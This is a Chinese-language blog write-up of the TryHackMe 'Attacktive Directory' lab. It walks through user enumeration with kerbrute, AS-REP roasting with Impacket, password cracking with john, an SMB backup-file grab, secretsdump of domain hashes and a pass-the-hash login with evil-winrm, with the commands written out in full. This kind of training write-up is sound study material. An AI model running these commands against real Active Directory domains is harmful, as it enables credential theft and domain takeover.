Attacktive Directory on Tryhackme

, , , ,

Before all

TryHackMe 上的連結:https://tryhackme.com/room/attacktivedirectory
AD是什麼?
Wikipedia 上的介紹

在台灣好厲駭的課有聽過一次Mars大大的AD課程,但因為真的第一次接觸加上東西爆炸多,其實也沒真的學進去多少(頂多觀念),剛好在TryHackMe上看到一堆AD靶機,就來打打吧~

這台機器的在一個AD網路環境,它代表的是一台Kerberos DC(Domain Controller)。
雖然說這有點事後諸葛,但是本題的攻擊鍊是:

:::info
字典攻擊找username -> TGT暴破svc-admin的密碼 -> 用 svc-admin 的身分登入 smb 找到使用者 backup 的密碼備份檔 ->用 backup 的身分透過DRSUAPI的方法炸出每個使用者的hash -> 利用 Pass The Hash 攻擊登入 Administrator
:::

Victim’s IP : 10.10.162.250
Victim’s Host : spookysec.local
Attacker’s IP : 10.9.195.189

註: 記得去變更/etc/hosts設定檔改Host Name

Write Up

RECON

nmap

Command
nmap -sC -sV -Pn 10.10.162.250
Result 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Nmap scan report for 10.10.162.143
Host is up (0.29s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-03 08:36:16Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-03-02T08:23:05
|_Not valid after:  2024-09-01T08:23:05
|_ssl-date: 2024-03-03T08:36:43+00:00; +1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-03-03T08:36:34+00:00
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-03-03T08:36:37
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 0s

Analyze
有smb service, RDP,整體架構是AD網路,HOST NAME是spookysec.local

enum4linux

Command
enum4linux -a spookysec.local
Result
image

image

許多User資料被炸出來
獲得NetBios Name是THM-AD(但以後續動作來看沒什麼功能…)

kerbrute

新工具,可以去Github上下載到:
Click Me : https://github.com/ropnop/kerbrute/releases

透過題目提供的userlist.txt進行攻擊(也有提供password.txt做後續的hash爆破)
command:

1
kerbrute userenum --dc 10.10.184.186 -d spookysec.local usernames.txt

Result
image

Exploit

首先,安裝Impacket工具包 

1
2
3
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py install

可能會需要掛sudo(後續攻擊行為也有很多需要,就不贅述)

TGT Attack with svc-admin

獲取TGT的原理大致上是在kerberos驗證的時候進行訊息劫持…(?應該啦)
注意我這時候在的路徑是/opt/impacket/examples
利用Impacket的GetNPUsers.py進行攻擊
Command 

1
python3 GetNPUsers.py spookysec.local/svc-admin -no-pass

Result
image

password cracking
把剛剛的結果丟到pass
john pass --wordlist=passwordlist.txt
image

SMB to get backup’s password

這步沒太多東西,就是拿到剛剛svc-hosts的密碼後登入smb service

smbclient -U svc-admin //10.10.162.143/backup

image

密碼get!!

image

backup to Administrator

利用Impackets中的secretsdump.py結合backup權限炸出各個使用者的密碼 hash
Command
sudo python3 secretsdump.py -just-dc [email protected]
Result
image

拿到密碼hash後透過Pass The Hash攻擊登入admin

What is pass the hash attack?
看這篇:https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67

利用evil-winrm工具進行Pass The Hash攻擊直接登入
Command
evil-winrm -i 10.10.88.124 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Result
image

RCE!!!
如何確認自己在AD裡面的身分:
Get-ADUser -Identity "Administrator" -Properties *

After all

經過這台靶機感覺多會了蠻多技巧,AD還有超級超級多要學,繼續努力w
附上打這台機器沒什麼用但還是物盡其用搞得RDP
image

駭客ㄉ浪漫啊~
晚ㄢ :>